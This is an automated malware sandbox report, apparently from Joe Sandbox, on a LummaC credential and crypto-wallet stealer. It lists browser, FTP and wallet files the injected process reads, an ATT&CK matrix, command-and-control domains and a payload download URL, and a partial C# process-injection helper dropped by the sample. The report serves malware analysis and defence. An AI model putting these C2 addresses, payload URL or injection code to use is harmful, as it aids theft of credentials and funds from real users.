Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4588, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
TZ33WZy6QL.exe	53%	ReversingLabs	Win32.Trojan.Generic
TZ33WZy6QL.exe	100%	Avira	HEUR/AGEN.1306918
TZ33WZy6QL.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://knifedxejsu.cyou/apiO	100%	Avira URL Cloud	malware
https://knifedxejsu.cyou:443/apiHtPyoG	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/tbg9.exe	100%	Avira URL Cloud	malware
https://knifedxejsu.cyou/8	100%	Avira URL Cloud	malware
https://knifedxejsu.cyou:443/api	100%	Avira URL Cloud	malware
knifedxejsu.cyou	100%	Avira URL Cloud	malware
https://knifedxejsu.cyou/api	100%	Avira URL Cloud	malware
https://knifedxejsu.cyou/s	100%	Avira URL Cloud	malware
https://knifedxejsu.cyou:443/apioufONBU$	100%	Avira URL Cloud	malware
https://knifedxejsu.cyou:443/apid8pi.default-release/key4.dbPK	100%	Avira URL Cloud	malware
http://crl.microsoftFd	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/tbg9.exeP	0%	Avira URL Cloud	safe
https://knifedxejsu.cyou/	100%	Avira URL Cloud	malware
https://knifedxejsu.cyou/-	100%	Avira URL Cloud	malware
http://147.45.44.131	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
knifedxejsu.cyou	172.67.187.9	true	true		unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
knifedxejsu.cyou	true	Avira URL Cloud: malware	unknown
nightybinybz.shop	false		high
standartedby.shop	false		high
conceszustyb.shop	false		high
bakedstusteeb.shop	false		high
mutterissuen.shop	false		high
worddosofrm.shop	false		high
http://147.45.44.131/infopage/tbg9.exe	false	Avira URL Cloud: malware	unknown
moutheventushz.shop	false		high
respectabosiz.shop	false		high
https://knifedxejsu.cyou/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://knifedxejsu.cyou/apiO	RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://knifedxejsu.cyou:443/apiHtPyoG	RegAsm.exe, 00000005.00000002.1503409382.0000000001252000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://knifedxejsu.cyou/8	RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://knifedxejsu.cyou:443/api	RegAsm.exe, 00000005.00000002.1503409382.0000000001252000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://knifedxejsu.cyou:443/apid8pi.default-release/key4.dbPK	RegAsm.exe, 00000005.00000002.1503409382.0000000001252000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://knifedxejsu.cyou/s	RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://knifedxejsu.cyou:443/apioufONBU$	RegAsm.exe, 00000005.00000002.1503409382.0000000001252000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.microsoftFd	RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://knifedxejsu.cyou/	RegAsm.exe, 00000005.00000002.1503278370.0000000001235000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://knifedxejsu.cyou/-	RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	TZ33WZy6QL.exe, 00000000.00000002.1383275515.00000000026AB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.44.131/infopage/tbg9.exeP	TZ33WZy6QL.exe, 00000000.00000002.1383275515.0000000002641000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131	TZ33WZy6QL.exe, 00000000.00000002.1383275515.00000000026AB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false
172.67.187.9	knifedxejsu.cyou	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1551974
Start date and time:	2024-11-08 12:01:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TZ33WZy6QL.exe renamed because original name is a hash value
Original Sample Name:	aa167e9969d9b0dc9a2f2936bd397f31.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/7@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 36 Number of non-executed functions: 104
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: TZ33WZy6QL.exe

Simulations

Behavior and APIs

Time	Type	Description
06:02:31	API Interceptor	1x Sleep call for process: TZ33WZy6QL.exe modified
06:02:32	API Interceptor	7x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.44.131	7IXl1M9JGV.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/bhdh552.ps1
	Rechnung_643839483.pdf.lnk	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/cdeea.exe
	file.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gqgqg.exe
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
	ptgl503.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gpto03.exe
	Suselx1.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/g5.exe
	gkqg90.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/otqp9.exe
	test.bat	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
	009.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/98.exe
172.67.187.9	PV2Ch2EAZe.exe	Get hash	malicious	LummaC	Browse
172.67.187.9	L#U043e#U0430der.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
	Digiturk.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	2263411136878218402.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	https://dlsservicing.filecloudonline.com/ui/core/index.html#/	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://laughterchefs.ru/dot	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://assets-fra.mkt.dynamics.com/899008e9-019b-ef11-8a66-6045bd6cbcf8/digitalassets/standaloneforms/eef8cd2b-b69d-ef11-a72c-000d3ae7186c	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://iw.lrvm8.sa.com/teed/ettd/sf_rand_string_mixed(24)/khalid@startissueuk.co.uk	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.google.co.za/url?q=sf_rand(2000)pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/i%C2%ADw%C2%AD.lr%C2%ADv%C2%ADm8%C2%AD.sa.%E2%80%8Bco%C2%ADm%2Fteed%2Fettd%2Fsf_rand_string_mixed(24)/khalid@startissueuk.co.uk	Get hash	malicious	Unknown	Browse	13.107.246.45
knifedxejsu.cyou	7IXl1M9JGV.exe	Get hash	malicious	LummaC	Browse	104.21.19.177
	PV2Ch2EAZe.exe	Get hash	malicious	LummaC	Browse	172.67.187.9
	L#U043e#U0430der.exe	Get hash	malicious	LummaC	Browse	172.67.187.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.5.155
	Pedido de Cota#U00e7#U00e3o-241107_Pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ 4748.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Revised Order Copy.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	BAT547477.exe	Get hash	malicious	FormBook	Browse	104.21.92.223
	Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler 160924R0 _323282.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	K05MQ5BcC8.lnk	Get hash	malicious	Ducktail	Browse	104.21.86.219
	PO#150003191.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	https://embeds.beehiiv.com/64a15014-2eab-4da5-b4be-84e59873fb46	Get hash	malicious	Unknown	Browse	104.18.68.40
FREE-NET-ASFREEnetEU	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	147.45.42.138
	7YHOFCgxpw.elf	Get hash	malicious	Mirai	Browse	147.45.42.138
	TPh0PC8M9m.elf	Get hash	malicious	Mirai	Browse	147.45.42.138
	uP63c5JI0f.elf	Get hash	malicious	Mirai	Browse	147.45.42.138
	arm7.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	mpsl.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	arm5.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	arm4.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	7IXl1M9JGV.exe	Get hash	malicious	LummaC	Browse	147.45.44.131
	Set-up.exe	Get hash	malicious	LummaC	Browse	147.45.47.81

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	172.67.187.9
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.187.9
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.187.9
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.187.9
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.187.9
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.187.9
	file.exe	Get hash	malicious	LummaC	Browse	172.67.187.9
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	172.67.187.9
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	172.67.187.9
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.187.9

Process:	C:\Users\user\Desktop\TZ33WZy6QL.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.0.cs

Download File

Process:	C:\Users\user\Desktop\TZ33WZy6QL.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	10583
Entropy (8bit):	4.487855797297623
Encrypted:	false
SSDEEP:	192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
MD5:	B022C6FE4494666C8337A975D175C726
SHA1:	8197D4A993E7547D19D7B067B4D28EBE48329793
SHA-256:	D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
SHA-512:	DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
Malicious:	true
Reputation:	low
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline

Download File

Process:	C:\Users\user\Desktop\TZ33WZy6QL.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	202
Entropy (8bit):	4.965909903847746
Encrypted:	false
SSDEEP:	6:pAu+H2L/6K2qLTwi23fNUJuGzxszIqLTwi23fNUJub:p37L/6KbwZWuGUwZWub
MD5:	ED3383864BB555F6D5A1E20CA4531278
